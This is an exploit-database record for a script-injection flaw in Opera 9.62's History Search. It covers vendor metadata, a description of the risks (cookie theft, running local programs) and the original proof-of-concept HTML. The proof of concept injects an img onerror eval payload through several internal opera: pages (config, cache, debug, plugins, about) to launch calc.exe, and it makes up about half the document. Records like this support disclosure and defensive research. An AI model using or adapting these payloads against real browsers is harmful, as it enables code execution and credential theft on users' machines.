Opera Web Browser 9.62 Remote Code Execution Vulnerability

vendor:

Opera Web Browser

by:

NeoCoderz

7.5

CVSS

HIGH

Input Validation

CWE

Product Name: Opera Web Browser

Affected Version From: 9.62

Affected Version To: 9.62

Patch Exists: YES

Related CWE: N/A

CPE: o:opera_software:opera_web_browser

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Opera Web Browser 9.62 Remote Code Execution Vulnerability

Opera Web Browser is prone to an input-validation vulnerability because of the way it stores data used for the History Search feature. Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, obtain sensitive information, alter the browser's configuration settings, or execute local programs in the context of the browser; other attacks are also possible.

Mitigation:

Users should avoid visiting untrusted websites and clicking on suspicious links.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/32015/info

Opera Web Browser is prone to an input-validation vulnerability because of the way it stores data used for the History Search feature.

Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, obtain sensitive information, alter the browser's configuration settings, or execute local programs in the context of the browser; other attacks are also possible.

Opera Web Browser 9.62 is vulnerable.

<!-- # OPERA 9.62 Remote Code Execution # Vulnerability Found By NeoCoderz # Email : NeoCoderz1[at]msn[dot]com --> <html> <script> function execcalc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalc()">Click me...(opera:config)</a><br> <script> function execcalca() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br> <script> function execcalcb() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br> <script> function execcalcc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br> <script> function execcalcd() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br> </html>